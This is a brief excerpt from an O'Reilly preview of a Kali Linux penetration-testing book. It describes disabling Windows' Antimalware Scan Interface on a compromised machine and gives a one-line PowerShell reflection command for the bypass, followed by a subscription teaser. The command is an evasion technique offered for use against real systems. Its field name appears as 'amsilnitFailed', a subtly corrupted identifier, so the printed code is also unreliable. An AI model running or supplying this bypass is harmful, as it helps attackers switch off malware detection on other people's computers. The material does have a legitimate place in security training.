Disabling Windows Antimalware Scan Interface

Microsoft has included its AMSI in recent versions of Windows to prevent any sort of malicious code from being executed on a local system. If you're compromising a Windows operating system, executing PowerShell scripts can be very helpful, but AMSI will prevent any malicious actions. To disable AMSI, execute the following PowerShell script:

"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsilnitFailed','NonPublic,Static').SetValue($null,$true)"

The following screenshot shows the successful execution of the script on a Windows 10 operating system:

At this point, you can ...

Get Learn Kali Linux 2019 now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.